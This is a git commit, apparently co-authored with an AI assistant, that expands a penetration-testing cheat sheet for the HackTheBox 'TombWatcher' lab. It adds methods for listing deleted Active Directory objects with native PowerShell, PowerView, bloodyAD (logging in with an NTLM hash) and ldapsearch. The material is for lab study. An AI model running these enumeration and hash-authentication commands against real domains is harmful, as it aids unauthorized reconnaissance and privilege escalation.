commit 64609dbf1ea4dda7623ac7ce75058f05e0c758d5
parent f09ff7596b9b8702c862d720ff1635b48f42a7da
Author: DAEMON <zer0sec.xp@icloud.com>
Date: Sun, 20 Sep 2026 03:39:35 +0100
Expand Recycle Bin cheat sheet: native PS, PowerView, bloodyAD, ldapsearch
Add Windows PowerShell enumeration both WITHOUT PowerView (Get-ADObject
-IncludeDeletedObjects) and WITH PowerView (Get-DomainSearcher + .Tombstone),
alongside the existing bloodyAD and ldapsearch methods.
Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
Diffstat:
1 file changed, 32 insertions(+), 4 deletions(-)
diff --git a/src/content/sheets/active-directory/ad-recycle-bin-tombwatcher.md b/src/content/sheets/active-directory/ad-recycle-bin-tombwatcher.md
@@ -39,13 +39,39 @@ rusthound-ce -c All -d tombwatcher.htb -u 'john@tombwatcher.htb' -p 'password' -
## 2 · Enumerate the AD Recycle Bin
-**From Windows / WinRM (native module, on any DC):** pull `objectSid` and `lastKnownParent` so copies can be told apart.
+Four ways to read deleted objects — pick whichever matches your foothold. Always pull `objectSid` and `lastKnownParent` so duplicate copies can be told apart (see §3).
+
+### A · Windows PowerShell — native, no PowerView
+
+The `ActiveDirectory` module ships on every DC (and any host with RSAT). `-IncludeDeletedObjects` is the switch:
+
+```powershell
+Import-Module ActiveDirectory
+Get-ADObject -Filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' `
+ -IncludeDeletedObjects -Properties objectSid,lastKnownParent,msDS-LastKnownRDN |
+ Format-Table msDS-LastKnownRDN,objectSid,lastKnownParent
+# target one by its old name:
+Get-ADObject -LDAPFilter '(msDS-LastKnownRDN=cert_admin)' -IncludeDeletedObjects -Properties *
+```
+
+### B · Windows PowerShell — with PowerView
+
+PowerView has no deleted-object cmdlet, but its searcher exposes the tombstone control. Grab a `Get-DomainSearcher`, flip `.Tombstone`, then `FindAll()`:
```powershell
-Get-ADObject -Filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -IncludeDeletedObjects -Property objectSid,lastKnownParent
+Import-Module .\PowerView.ps1
+$ds = Get-DomainSearcher -LDAPFilter '(&(isDeleted=TRUE)(!(name=Deleted Objects)))'
+$ds.Tombstone = $true # adds the LDAP "Show Deleted Objects" control
+$ds.PropertiesToLoad.AddRange(@('msDS-LastKnownRDN','objectSid','lastKnownParent'))
+$ds.FindAll() | ForEach-Object { $_.Properties }
```
-**From Linux (no upload, no shell) with bloodyAD** — `1.2.840.113556.1.4.2064` is the LDAP *Show Deleted Objects* control:
+> [!warning] With PowerView, `Get-DomainObject` will NOT show them
+> `Get-DomainObject` / `Get-DomainUser` build a searcher **without** the tombstone control, so the bin looks empty and you conclude there's nothing there — exactly the trap that wastes time on a box like this. You must drop to the raw `Get-DomainSearcher` + `.Tombstone = $true` above. And PowerView cannot **restore** an object — for that you still fall back to native `Restore-ADObject` or bloodyAD (§4). Native `Get-ADObject -IncludeDeletedObjects` (A) is one line and does both halves, so prefer it when the module is present.
+
+### C · Linux — bloodyAD (no upload, no shell)
+
+`1.2.840.113556.1.4.2064` is the LDAP *Show Deleted Objects* control:
```bash
bloodyAD -u john -d tombwatcher.htb -p ':8846f7eaee8fb117ad06bdd830b7586c' \
@@ -53,7 +79,9 @@ bloodyAD -u john -d tombwatcher.htb -p ':8846f7eaee8fb117ad06bdd830b7586c' \
--filter '(isDeleted=TRUE)' --attr name,objectSid,lastKnownParent
```
-**From Linux with ldapsearch** — same control by OID, add `!` to make it critical:
+### D · Linux — ldapsearch
+
+Same control by OID; the leading `!` marks it critical:
```bash
ldapsearch -x -H ldap://10.129.232.167 -D 'john@tombwatcher.htb' -w 'password' \